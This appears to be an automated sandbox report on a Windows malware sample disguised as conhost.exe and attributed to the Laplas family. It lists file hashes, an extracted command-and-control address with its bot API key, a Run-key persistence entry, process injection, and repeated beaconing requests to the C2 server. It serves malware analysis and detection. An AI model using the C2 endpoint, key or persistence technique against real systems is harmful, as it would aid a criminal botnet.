Analysis

Max time kernel: 135s
Max time network: 155s
Platform: windows10-2004_x64
Resource: win10v2004-20230220-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 17-05-2023 15:29

Static task: static1
Behavioral task: behavioral1
  Sample: conhost.exe
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: conhost.exe
  Resource: win10v2004-20230220-en
General

Target: conhost.exe
Size: 4.0MB
MD5: feccda803ece2e7a3b7e9798714ad47e
SHA1: e97182adccf8a7692e6ad2614b0fb7fd3898a1a2
SHA256: 14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320
SHA512: dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287
SSDEEP: 49152:jEjwvlIKv05z+UERnIcYmWjc3Cdh+5E9UFiqeb0/B1:RlhWzZ6hjEciqe
Malware Config

Extracted family: laplas
C2: http://185.223.93.251
api_key: f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
Signatures

- Executes dropped EXE (1 IoC)
  PID: 536
  Process: ntlhost.exe

- Adds Run key to start application (2 TTPs, 1 IoC)
  Description: Set value (str)
  IoC: \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"
  Process: conhost.exe

- GoLang User-Agent (1 IoC)
  Uses the default user-agent string defined by the GoLang HTTP packages.
  Description: HTTP User-Agent header
  Flow: 21
  IoC: Go-http-client/1.1

- Suspicious use of WriteProcessMemory (2 IoCs)
  Description: PID 2172 wrote to memory of 536
  PID: 2172
  Process: conhost.exe
  procid_target: 84

  Description: PID 2172 wrote to memory of 536
  PID: 2172
  Process: conhost.exe
  procid_target: 84
Processes

1. C:\Users\Admin\AppData\Local\Temp\conhost.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
   PID: 2172
   Signatures: Adds Run key to start application; Suspicious use of WriteProcessMemory

   2. C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe (child of PID 2172)
      Command line: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      PID: 536
      Signatures: Executes dropped EXE
Network

Remote address: 8.8.8.8:53
Request: 104.219.191.52.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 76.32.126.40.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 95.221.229.192.in-addr.arpa IN PTR
Response: (empty)

Remote address: 185.223.93.251:80
Request:
  GET /bot/regex HTTP/1.1
  Host: 185.223.93.251
  User-Agent: Go-http-client/1.1
  Accept-Encoding: gzip
Response:
  HTTP/1.1 200 OK
  Date: Wed, 17 May 2023 15:29:52 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 633
  Connection: keep-alive

GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin (process: ntlhost.exe)
Remote address: 185.223.93.251:80
Request:
  GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
  Host: 185.223.93.251
  User-Agent: Go-http-client/1.1
  Accept-Encoding: gzip
Response:
  HTTP/1.1 200 OK
  Date: Wed, 17 May 2023 15:29:52 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 2
  Connection: keep-alive

Remote address: 185.223.93.251:80
Request:
  GET /bot/regex HTTP/1.1
  Host: 185.223.93.251
  User-Agent: Go-http-client/1.1
  Accept-Encoding: gzip
Response:
  HTTP/1.1 200 OK
  Date: Wed, 17 May 2023 15:30:52 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 633
  Connection: keep-alive

GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin (process: ntlhost.exe)
Remote address: 185.223.93.251:80
Request:
  GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
  Host: 185.223.93.251
  User-Agent: Go-http-client/1.1
  Accept-Encoding: gzip
Response:
  HTTP/1.1 200 OK
  Date: Wed, 17 May 2023 15:30:52 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 2
  Connection: keep-alive

Remote address: 185.223.93.251:80
Request:
  GET /bot/regex HTTP/1.1
  Host: 185.223.93.251
  User-Agent: Go-http-client/1.1
  Accept-Encoding: gzip
Response:
  HTTP/1.1 200 OK
  Date: Wed, 17 May 2023 15:31:53 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 633
  Connection: keep-alive

GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin (process: ntlhost.exe)
Remote address: 185.223.93.251:80
Request:
  GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
  Host: 185.223.93.251
  User-Agent: Go-http-client/1.1
  Accept-Encoding: gzip
Response:
  HTTP/1.1 200 OK
  Date: Wed, 17 May 2023 15:31:53 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 2
  Connection: keep-alive

Remote address: 8.8.8.8:53
Request: 196.249.167.52.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 251.93.223.185.in-addr.arpa IN PTR
Response: 251.93.223.185.in-addr.arpa IN PTR customerclientshostnamecom

Remote address: 8.8.8.8:53
Request: 86.8.109.52.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 97.17.167.52.in-addr.arpa IN PTR
Response: (empty)
Network flows (HTTP)

Remote: 185.223.93.251:80
URL: http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
Protocol: http
Process: ntlhost.exe
Sent: 1.6kB (15 packets)
Received: 3.7kB (17 packets)
Requests in this flow:
  GET http://185.223.93.251/bot/regex -> HTTP 200
  GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin -> HTTP 200
  GET http://185.223.93.251/bot/regex -> HTTP 200
  GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin -> HTTP 200
  GET http://185.223.93.251/bot/regex -> HTTP 200
  GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin -> HTTP 200
Network flows (DNS)

Sent   | Received | Pkts sent | Pkts recv | DNS request
73 B   | 147 B    | 1         | 1         | 104.219.191.52.in-addr.arpa
71 B   | 157 B    | 1         | 1         | 76.32.126.40.in-addr.arpa
73 B   | 144 B    | 1         | 1         | 95.221.229.192.in-addr.arpa
73 B   | 147 B    | 1         | 1         | 196.249.167.52.in-addr.arpa
73 B   | 115 B    | 1         | 1         | 251.93.223.185.in-addr.arpa
70 B   | 144 B    | 1         | 1         | 86.8.109.52.in-addr.arpa
71 B   | 145 B    | 1         | 1         | 97.17.167.52.in-addr.arpa
MITRE ATT&CK Enterprise v6
Downloads

- Filesize: 384.8MB
  MD5: 59e30a386a548161ffb85ce155376f69
  SHA1: 953b85e50bfde88e1c3309a0cb49e86e1a78b13a
  SHA256: 2c4651ef6233e71269286dad60dd3fdae2d48d18080f8d65227c438a7f5d381f
  SHA512: 7278dd127883e1b7fa167a92b50becd4ab29e5098b03ea95740710302457a61c05ebf7347610ef12cca79fd3723602f7977aa8919de25f33f06212e6b4fce2fd

- Filesize: 381.7MB
  MD5: a43f106734e07aaf60929de2f6a7a308
  SHA1: f7ece4e6e6cd7fc1f4a6432493789bbb5a6abb1e
  SHA256: aa9c6c193aa0c6fd91492db278475f1400f876ccc8cbcefc18e0b3a522faeffd
  SHA512: 1109434606fda21698a28bd793a18bd2f4b8b42aa44f7ad54234b9043e4b8272584bb3cd53ef97a9a9f8d9159d797a4fae6babfb1bb1b6560210e57f95e1313f